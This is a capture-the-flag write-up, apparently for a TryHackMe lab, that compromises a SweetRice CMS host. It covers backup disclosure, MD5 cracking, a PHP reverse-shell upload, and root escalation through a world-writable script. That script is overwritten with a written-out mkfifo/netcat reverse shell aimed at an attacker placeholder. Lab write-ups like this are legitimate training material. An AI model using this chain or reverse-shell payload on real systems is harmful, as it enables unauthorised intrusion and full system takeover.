================================================================================
CTF WRITEUP: SWEETRICE CMS
Target IP: 10.201.16.209
================================================================================

1. ENUMERATION
--------------------------------------------------------------------------------
Command: nmap -sC -sV 10.201.16.209
Results:
- 22/tcp (SSH)  - OpenSSH 7.2p2
- 80/tcp (HTTP) - Apache 2.4.18

2. WEB DISCOVERY
--------------------------------------------------------------------------------
Found a /content/ directory. Further brute forcing revealed:
- /content/as/  : CMS Login Page
- /content/inc/ : Directory listing enabled, contains /mysql_backup/

Exploit: SweetRice 1.5.1 - Backup Disclosure
I downloaded the .sql backup file from /content/inc/mysql_backup/ to find 
user credentials.

3. HASH CRACKING
--------------------------------------------------------------------------------
Found MD5 hash in SQL file: 42f749ade7f9e195bf475f37a44cafcb
Command: hashcat -m 0 42f749ade7f9e195bf475f37a44cafcb /usr/share/wordlists/rockyou.txt

Result: Password123
User: manager (or admin)

4. INITIAL ACCESS (REVERSE SHELL)
--------------------------------------------------------------------------------
1. Logged into /content/as/ with manager:Password123.
2. Uploaded a PHP reverse shell (shell.phtml) via the CMS "Ads" or "Media" 
   upload feature.
3. Started listener: nc -lvnp 4444
4. Executed shell by navigating to the uploaded file path.

Shell Upgrade:
python -c 'import pty; pty.spawn("/bin/bash")'

User Flag: THM{63e5bce9271952aad1113b6f1ac28a07}

5. PRIVILEGE ESCALATION
--------------------------------------------------------------------------------
Checking Sudo: sudo -l
Result: User can run /usr/bin/perl /home/itguy/backup.pl as root.

Analyzing backup.pl:
The perl script executes a shell script located at /etc/copy.sh.
Since /etc/copy.sh is world-writable, I modified it to send a root reverse shell.

Payload:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc [ATTACKER_IP] 5554 > /tmp/f" > /etc/copy.sh

Execution:
1. Start listener on port 5554.
2. Run the perl script with sudo:
   sudo /usr/bin/perl /home/itguy/backup.pl

6. FINAL FLAGS
--------------------------------------------------------------------------------
[ROOT] cat /root/root.txt -> THM{6637f41d0177b6f37cb20d775124699f}
================================================================================
